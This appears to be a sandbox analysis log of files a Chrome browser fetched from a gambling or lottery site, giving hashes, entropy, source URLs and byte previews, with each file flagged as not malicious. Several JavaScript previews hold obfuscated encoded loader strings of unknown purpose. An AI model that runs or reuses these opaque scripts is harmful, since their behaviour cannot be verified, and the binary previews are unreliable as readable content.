                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 23.2 (Windows)" xmpMM:InstanceID="xmp.iid:6A14FA8893A511EC9B20F2CBA5BE0449" xmpMM:DocumentID="xmp.did:6A14FA8993A511EC9B20F2CBA5BE0449"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6A14FA8693A511EC9B20F2CBA5BE0449" stRef:documentID="xmp.did:6A14FA8793A511EC9B20F2CBA5BE0449"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>v.;.....IDATx..}.x...;u{...b.,..L...7S...B.$$8...!....%4....B....^%7Y.l..+...)..].,..`s.{.y...M.s..}.W....q..K.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 50 x 26, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1844
                                                                                                                                                          Entropy (8bit):7.3375143613126905
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:wzo7FDNn2DAmAjJ36ox76tDafOeWOFD9aFTMfut:Go7F528mAMox7er25ut
                                                                                                                                                          MD5:20C36AD39FBFBA6A302627219C53A9ED
                                                                                                                                                          SHA1:23D1261482CDE1126C8D51EDBA397BF346D3CF2C
                                                                                                                                                          SHA-256:5F643358B9347A755C9BA8F19911E910E07F2F5FDE2852D7E09AF8E1838992D5
                                                                                                                                                          SHA-512:6E0092936F4A786AEEE084466DA119234D7D88DEA75D1D79A9654CB68429E60E13EE866BD091303A48B5FFA2C3CBD7BAED3E27C7FA33A1D6F13EC148F5F9D339
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/index/121/nav/elecico.png
                                                                                                                                                          Preview:.PNG........IHDR...2.........z.......tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:A795B6DCA6D711E9A6E4FDCCD8812283" xmpMM:DocumentID="xmp.did:A795B6DDA6D711E9A6E4FDCCD8812283"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A795B6DAA6D711E9A6E4FDCCD8812283" stRef:documentID="xmp.did:A795B6DBA6D711E9A6E4FDCCD8812283"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>G9......IDATx..WYL.A..n..mw...T*...5....@P.}G....<^4.x<....'5>hB...Q....h..xQ.%.RZJ..v..D...J...L6.N...o....b6.M....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 80 x 78, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):12833
                                                                                                                                                          Entropy (8bit):7.9760802559973785
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:fm1LqxNRiig1vYITMnhptGrF6wfmu1eE5J:+sxNwi+AuMn7tGUwf51DJ
                                                                                                                                                          MD5:3BF29635B8BF039BF07537262FE4918F
                                                                                                                                                          SHA1:80E7764EA677970CE57A03ECC9C0CFED885A85EB
                                                                                                                                                          SHA-256:8A3E3DFD491DC1251F2F66AC1AD057A730CCA7480E1E4AA30F063B813734F263
                                                                                                                                                          SHA-512:D2A995A720D415761EE37028DE38F6614AAB3EF1A129897889235B9CAAD4FA6391E52111FB956A5FCFBCFF196AD445E633A490383ECA4AE2FF10CBE708950FAC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...P...N.......F....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD............18IDATx..y.WU...\k.?.....2....u..9.#.8O. `.b..(.N. ."**.$jf..Zv....C*(..?......s..$......z<.....~..z....~...C..D.w..?...p@,...lr....%.;.... ..Vs..;2.|b`!..Y../.{;.`+..p......>..Y..1....?.UY.".f..b..6P...wo}.sN.R..... A.*B.L..S..H....@".X,5lO.....#7......h....o?.*.+..\u.~.~.IeO..{@j....#@:.....?t7`O.{Z!....W.O.x.]...\....L*(.r.o.5.........%.w.........}$..].3..@.........?...F.......*3..R!.U.s1V.p.',...b2....Xi....CD...I..%.4.J.. .7....O>..x..K.|...*.:p&......`,(...W..-....@.u.s.C...........|.%..~c....XT..!2*...d....^..WW..MJ..c.D...D.'..s....g....k.-..;....{.k..g......b.G|..^KW..6.._z..s#...}..W..lv...g.....T"=o..J....-.~....v.S.....MA...VbL.q......5.2?.m...B:|.@Z.Ox.!@83PhP.Dj...T......b.>.....(@..q.H.j..{........K.zd.^3x.`}.,...>......m..O...4..L0.....n....(.3..IE..bd..$...tn.......&W [..t...........6.3...8...k..s.'*.O.Y....a..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 114 x 114, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5841
                                                                                                                                                          Entropy (8bit):7.871888768386612
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:F5kmaitWhCGXXg05GXYnZDXnXZkHtvKBStJd4yAYcRM8RySxNIEVXyC:ajXp5GonR3XKNRGyDgp1IEVXJ
                                                                                                                                                          MD5:BCD45CED07A9623523B13BA9C1B0DF7F
                                                                                                                                                          SHA1:656C06C91B5F5718BFF89828CD08B139A05C9128
                                                                                                                                                          SHA-256:A5CA08AA4D39A0297A5BD6CAA84AF6D569D2CA40DDA40D89422251E975B55D5B
                                                                                                                                                          SHA-512:2F583916DB15FFAA3D47AE7769D900DF7CB2D816D79C8B98CDB3A699A073FA2506F4D685327400076165B4A40AA2E10E210436B03510BC24C70C4C0F51604670
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/lotto/lottery_vr.png
                                                                                                                                                          Preview:.PNG........IHDR...r...r.......}....tEXtSoftware.Adobe ImageReadyq.e<...niTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:420a253f-21eb-c14d-bee9-9f8f530514c9" xmpMM:DocumentID="xmp.did:B8082874819511E78C02F58BB957D46E" xmpMM:InstanceID="xmp.iid:B8082873819511E78C02F58BB957D46E" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F1FEA7DC733311E791979FB237C57C41" stRef:documentID="xmp.did:F1FEA7DD733311E791979FB237C57C41"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.g......IDATx..]...U.}.......d.5.+JVAY%(
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (5240), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5240
                                                                                                                                                          Entropy (8bit):5.908883691605881
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:VtYTmga+5+vCfFXily4XY5jlsQKi4OPM5A/J1llffuh0nbfZbIlhx1c9:Vt2mx+5+vCkIB5jlsQV9lleh0nNbuK9
                                                                                                                                                          MD5:2550867ECD6E45B82BF66302F09ED65D
                                                                                                                                                          SHA1:87C249625C01798DCBBB1C048426277DFAC5CA12
                                                                                                                                                          SHA-256:1E16F61A53CDA8D3B89972D82E7CF124282F0673B1D5AC54699F63F5AFA5C813
                                                                                                                                                          SHA-512:9B95DBC6CEDDFCAB82DF4E56B51B855A987F1EE0B2DE298D249429B4A810E8729A1A8C90C559C95B26462CE005AA3674978895B65A0039D22465DCFDB254F12C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/ConversionBox.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHAZlwF0AaAbwDMUBPFALgoFc0YAXAS3U1ZKgEoyAXxIAPAJIBGADYNmbTmm68S7AQCJGSEAAIkrAE7s2agNwB5MACsQbAHQATEBXZoQABX0oIIfa2qYoEjUAfWCQJABZFHtGKRA1cgA3KClGEDoAQgAGQT4TZP1tEABedkw1ABF7XGA1PhI0UttFEHqkUvKsmAgKOpJ9DrUIgBYKADE+qSbFfXqYQYrGAHoAJj6UQYA5AE0RMz77YsxFPkwhEgtrNkwUWwBbKAgAcRBWVh8kU+w1diQAGRQAHMXAk1FIgS4xPZQWAUlAWPEgjB0IkPgoAMoACxQtSRKLR6ChoORaFR+iQCkuoNYmPY+nsbigvmof1+rFBDxcrCgLlZelBIBEMEx8MBIDGUiggNBvwAKvpqG5JdQ1EQ+PUTmdhJcbKwbvdHhFGNyOOhPmdflicXQYLZLCQtKwoTbbOwHa8AEJwhEukC5cggNDvfRPKB3dJMFimk5kGm/V1IK3ATAZCT1ONIWwQZWy2n0xnM0PhzB8YToMYoGCaWRRhQl85i1i5ukMpl+WGSn2R+RcVgCAraKDFDMmdgUTASYrD2mZwXC0XiyWAgA+y4zCfliuVfHX2ag1Gb+bb1CLIBLJhAUi0ZAH7GnvxIJUzjgoUFirFsAFUOFJbI3D/YULcH+YYgCQH5+N4GrFEIJhoNgEHUN4RDDiB4b5Ey2gDM+ThvlIH4RDyQZEX+ryEVyRFAWgeRjpgv5QK6LCpI4SDcDOBoUbybIkJsjB3GAPiYLM6q7jmeatoWoHnpe14DvM9G2M4aD2Gx8ZxkezJ8jw3bRtwAj6K8jD6Gg2gfuwhzFCAABkVkZGZSAAILGiguQmDAAD8qmZupEl+FCxS2uZ4HsT5mygQFzSgSoCZJimWRtA4uHvrYDkQOw6I+IkRggKRTbiQWfiflo+hep2MBnuuPkFdQUJ8LYNKB
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 16 x 20
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1419
                                                                                                                                                          Entropy (8bit):6.752395769610551
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:IbTGal1hiyWwylZ82lYSqMHiwfybJVdqT3XyJ3VeXyeGY8QDcDdIRndD:EHuinNuiYSJHqeJ3sXyeL8QTN
                                                                                                                                                          MD5:067EE9C9600307D022C04376997E3BFF
                                                                                                                                                          SHA1:3C21BE15E92EE515397B49FD4628314947ACB8FF
                                                                                                                                                          SHA-256:1EE6DD9415D7FED056B24CADE0F4F6DE395D261910FD33A68DB5BC3E833B9981
                                                                                                                                                          SHA-512:0B38182C8621E5958026105C7485D93E153B9C1839D122B8A013BFB6927E54EDF321D9AA25A2886F752F9DEFF7B4961BE14F5CECCCD512FDD508C7823FA1C65F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:GIF89a...................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="xmp.did:62be2946-4857-b94d-acd5-ddb75780d8a5" xmpMM:DocumentID="xmp.did:5FB7481C070011E699EB869F01D12DEE" xmpMM:InstanceID="xmp.iid:5FB7481B070011E699EB869F01D12DEE" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7a2664c9-b559-9341-8eeb-a6be433adbdc" stRef:documentID="adobe:docid:photoshop:f249bf3f-06ff-11e6-905c-86693c0c298a"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1877
                                                                                                                                                          Entropy (8bit):6.37720772895727
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:x/6/zNnwknA9Wp8U8pcJ313DHFsiB7KpleFG2Y:xSBwknmWp892HFsI03
                                                                                                                                                          MD5:F79E6597A4B2FE7B4462A6419A9D6763
                                                                                                                                                          SHA1:24B5E143A47E7C655B2B981B5192F5B4E5803AAF
                                                                                                                                                          SHA-256:4F752C16D750C5E8BCC94105BFA1DF0CBF2FC0739592C045CE19DA33EC59735A
                                                                                                                                                          SHA-512:59BA5F516E0375E5EB306A0BC6C92A89CD64C5AEB3B9364952652F78FF76A93833D68AFADFDA5A5B821A6A3AD4A773E5F21851164A55EC65BCF26C8FA11D5D60
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR..............w=.....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmp:CreateDate="2023-07-19T12:07:20+08:00" xmp:ModifyDate="2023-07-24T11:26:39+08:00" xmp:MetadataDate="2023-07-24T11:26:39+08:00" xmpMM:InstanceID="xmp.iid:05dc8479-3604-4e4b-8ace-0432e51c907a" xmpMM:DocumentID="xmp.did:E1A584F7F3A011E7A3A8D9167784E8E3" xmpMM:OriginalDocumentID="xmp.did:E1A5
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17878
                                                                                                                                                          Entropy (8bit):7.959716583208729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:OBLtpneFRErL/izHYU4KNT+GbKJrnl0YMMlTY3X4K6gwI:YtpnCErkN4K8GbKJrnl4Y/gL
                                                                                                                                                          MD5:3421B805EE092419843BD0B3CF2F3AD5
                                                                                                                                                          SHA1:FCDCA9406D3B0A7DE619225D006968F16F401528
                                                                                                                                                          SHA-256:2E72A4B6BB750E21045AA7BA60ABFBD2EA5FB721579ABD2F75875008FD815BD4
                                                                                                                                                          SHA-512:1A8AD295C8B019AE032F5CF1F3A188C189F8B128F6459174D3817147338E3AAD4BE739E869D796161D5F0390820D96916E16FEF371FD9F33C5282B92F67D5599
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D208D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D1F8D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (6075), with CRLF line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):35313
                                                                                                                                                          Entropy (8bit):5.295540132066821
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:4WL+KxZDns9s+CaAttQyYgm+po5THCAAoT5CvohyZVD/aQHAfr6vWgwkDHqAZ:41kZ9auYo2HCA9tlhytv3wa
                                                                                                                                                          MD5:0D329DF2282392F7C5B7DC987318D388
                                                                                                                                                          SHA1:B49E384DB02B755EAB09D4441ECD9538B9488D56
                                                                                                                                                          SHA-256:18AFA71FF8EB7C6184F4AF6D4CC82F3764997BF1D85B4C74070A215EEEF25A3B
                                                                                                                                                          SHA-512:764B95B306F6BE43895AA884C83078357B59DC5081448D76A645C8D056D4C00FF6DB41B3A002C1A167FE22891F1DE836CB2CF86CB1091068C3E370D602499394
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://t2391.cc/default.html
                                                                                                                                                          Preview:<!DOCTYPE html>..<html>....<head>.. <meta charset=utf-8>.. <meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no">.. <title></title>.. <style>.. .init-ip-block{position: fixed;top: 0;left: 0;background-color: #000;}#home-fake-app{width:100%;position:absolute;top:0;left:0;z-index:-1}body{margin: 0;padding: 0;}#error-main{position:absolute;top:0;bottom:0;left:0;font-size:14px;text-align:center;width:100%;height:100%;overflow:hidden;box-sizing:border-box;z-index:1000;background-color:#fff }#error-main .middle{position:absolute;width:100%;top:50%;left:0;transform:translateY(-50%) }.tips-img{width:150px;height:93px;margin:auto auto 5px;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAARcAAACtCAMAAACtK8tBAAAA8FBMVEUAAACwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCvr6+wsLCvr6+wsLCwsLCwsLCwsLCwsLCwsLCvr6+vr6+wsLCvr6+urq6wsLCurq6urq6wsLCvr6+wsLCwsLCurq6wsLCwsLCwsLCwsLCwsLCurq6urq6urq6wsLCwsLCwsLCwsLCvr6+wsLCwsLCpqamwsLCtra2pqamwsLCwsLCwsL
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (860), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):860
                                                                                                                                                          Entropy (8bit):5.747083721513129
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:V4kEYO4npi1dO3LlhWOaCF80RGkSlOnjrn:V4RqpOdOblhWOaCFTRFSwnP
                                                                                                                                                          MD5:570835640BA3A9C10739A6AEDF945AD6
                                                                                                                                                          SHA1:AAB7F6B2A9D7BEBE1C11D1A469D074B5DF961C85
                                                                                                                                                          SHA-256:F7E4EB4058A5352F546C3D5DD39B66344AAAB9D725382DBCE4BED9A91CA57BB3
                                                                                                                                                          SHA-512:4B487DDD258D49596DF3A33E1EEA90A61ABCD1857E1257242AE4458520A5BE569FBAA8A7A5F5CB87C54B849D445660D65422DFBE99FBED2C48BAC0D637CB3699
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/imageLoader.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZnwBYBdAGgG8ANAaQEcBLALgDMBXNGAFwfUy7IgAlBQC+ZAOZsQAEVYduvNP0FkGIgERskIAARIuAJwbcNAbgDyYAFYhuAOgAmIFgzQgACoZQQQhrgCemCBkGgD6YSBIALIojmwANiAalABuUAnSTACEAAyiQmbphrpoALwMmBq5MBAsGkJkhmWYAMpGbhKUEN4QSEwUSIYwTO3GaBLijlBcUPKcPHwihiBcbIZoFAwAtlASIABCUDoAbERMaIkJouLAMzAAFgNDI1vb2yCODDMgOblkDygaEcSUM80UfC4Ii4DwYSHsCRQUEcAEldvtMEIbuIPjC4v0KIjkWi9r92AslJiKMVdFwyjC4WY0E4XFBElx7ABVHgJexwg4JIFwfiw+EvIQAHwlmGZzhYbISHO5DF5cJJ+xkdjin0xAH5Zaz2VyefZ9lxNTBtaj0YdjiAziK4fZxfYYSBlOSIcphBQVmsNrS+TajqciGUQAUmAz4TtSSH7WHo87hliyOgADJIxzgxbKaGi+wAEhA2wYXCqRMcDXE6AAooZvGDPbmqUni6Xyxo/I3q+IYCsftnm5SRDdGlAyr73c4mwoWyIaXS2/2QD9a0kPmguGY/etlEmwjoEix7GEYFKoVUdhIUhQZkYCS8owXY/t42ca2gBpXn06M1nBAbFAwSTOsgMMMdxAMGYTAAJWnPwADE0H6bASFEIooBKJAKiqAA1TkAHoAA4GkwQwyCgMhslwMhh0hERKg0WhGGrUJplmABaVJOIAVl43AiBYE5HFIshLgSBJChAFl5XZMp4RAAAPCBgK4JAxzMIA==")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2265
                                                                                                                                                          Entropy (8bit):5.131530584923505
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:Yv7bcQGHM6Lzc2Durqv40A0z6Py92M96el82JIx/cBb:G7YT3rDMK40sy208hZcBb
                                                                                                                                                          MD5:A8AC08BF071B661265C23F1809F79260
                                                                                                                                                          SHA1:6F4B82F43AF8F783FE0E4ADC1A74C29E977408D9
                                                                                                                                                          SHA-256:81BE6821D9742172DA13A0768984B350C0470E1A9F82CFEA27C222199772462C
                                                                                                                                                          SHA-512:4E47CBAE8E46EF19ECB3E1290F105CC58CBCEBD2C31DBED283BF8D6CFE7BF1B4B1CDE86E44EA0F2605326A6D0BC167FE400DB4F079C74B757FED7B1B0D0E1243
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi1961.hydqef.com/lt-cloud/stat.do?pv=ajax&pa=host.info&domain=856217.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972896779402
                                                                                                                                                          Preview:{"analyticsCode":"","domainType":1,"agentCode":"101106151266","snType":1,"iconRel":null,"paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"pi12","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{"smsLoginFlag":1,"thirdpartyTransferOutLowerThreshold":0,"userAccountLenghtMin":"5","messageUserToAgent":0,"activityVersion":1,"withdrawTimeLimitFlag":0,"auditTipsFlag":1,"lotteryProfitDayThreshold":"1000000","withdrawRequireMobile":0,"defaultAgentCodeFlag":0,"appFbLoginFlag":0,"subTranferToUpFlag":0,"auditWithdrawFlag":1,"iosCertificate":"","transferOutLowerThreshold":0,"appWxLoginFlag":0,"phoneCallback":0,"appDownloadLayerFlag":1,"limitNum":"5","videoProfitDayThreshold":300000,"liveChessForbid":1,"transferInLowerThreshold":0,"userEditFlag":0,"trialLoginFlag":1,"regCaptchaType":"normal","bankBindOption":1,"abandonCouponFlag":0,"openPhoneFlat":1,"moneyUnit":1,"openAutoDrawFlat":2,"onlineChargeMemoRequire":0,"openUserNameFlat":1,"loginIdRuleType":"1,2,3","openUserFeeFlat":1,"loginAt
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 14 x 17, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1142
                                                                                                                                                          Entropy (8bit):6.437317098042148
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:U1hiyWwjx82lY2T37VDnRdLRdyJ3VtDRYRRSGyyn5Xqc:auNn2v1RJRsJ3fDRIRSA6c
                                                                                                                                                          MD5:81C9A849D5D0825AF45E2B2F78D901FC
                                                                                                                                                          SHA1:62282B9E594751FB8ADCAE868B8D503E86F213B5
                                                                                                                                                          SHA-256:B3C4A7BCEFF4A3642083A85FFFA98A7145EC55422596AB00501E46DBF537B94A
                                                                                                                                                          SHA-512:2F1CA447B69F91B529CDF1D96CCE21F76ABD9D6428139EDB6C196FA9DAB1982E28FF83BDF8D7CB442E7A4E07B5E21674A927064819451460CBEA09CAC165D68E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:89276921F39411E7BE099690CD5A3249" xmpMM:DocumentID="xmp.did:89276922F39411E7BE099690CD5A3249"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8927691FF39411E7BE099690CD5A3249" stRef:documentID="xmp.did:89276920F39411E7BE099690CD5A3249"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>v.......IDATx.b...?.....m@...Al+tu.B............P9.....#...b7$q...G....)P..8..*...cb@.%(}......a.......,./..T ^..`
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2464), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2464
                                                                                                                                                          Entropy (8bit):5.875124749216365
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VaZO1x1hBa8+GSMQ2CS6XYpjWBflYzBPlSyD:Vac1xHBa8rSBXCqBfqzBNSs
                                                                                                                                                          MD5:952B45FE1E8206E87F4DADAD34E36DCA
                                                                                                                                                          SHA1:20C425FF5C10B6197E3CB80B5EC8469BC68990AD
                                                                                                                                                          SHA-256:DAEE6C011916220BA5FF9BC7DD7CAB0E7EEC216369278A62CA9C15C02AF04845
                                                                                                                                                          SHA-512:36923D84699397AE0F4B94FD6FEBB97FDF59041173D7D89D50C62FDFD65AC5A161358480C8ACC59CB696882EFC12A5DC244E5E2DED0675ADEC80E9A1919BDE01
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/neCaptcha.js
